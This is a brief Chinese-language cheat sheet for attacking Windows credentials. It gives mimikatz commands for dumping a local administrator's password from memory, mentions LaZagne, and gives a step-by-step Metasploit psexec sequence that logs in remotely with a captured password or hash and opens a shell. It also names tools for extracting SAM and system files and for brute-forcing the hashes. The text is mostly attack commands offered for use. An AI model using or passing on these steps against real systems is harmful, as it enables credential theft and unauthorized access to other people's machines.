一、本地管理员密码如何直接提取
1、直接通过mimikatz读取管理员密码
第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpassWords //抓取密码
2、Lazagne 需要本地支持python
二、本地HASH远程登入
主要通过MSF提供的exploit/windows/smb/psexec模块来完成。
msf>exploit/windows/smb/psexec
msf>set rhost IP
msf>set SMBUser administrator
msf>set SMBPass ..
msf>exploit
msf>shell
三、hash秘钥暴力破解
1、通过LC5暴力hash密码
使用gmer直接提权SAM和system文件,或则通过pwdump7
2、使用ophcrack破解系统hash密码
http://simeon.blog.51cto.com/18680/122160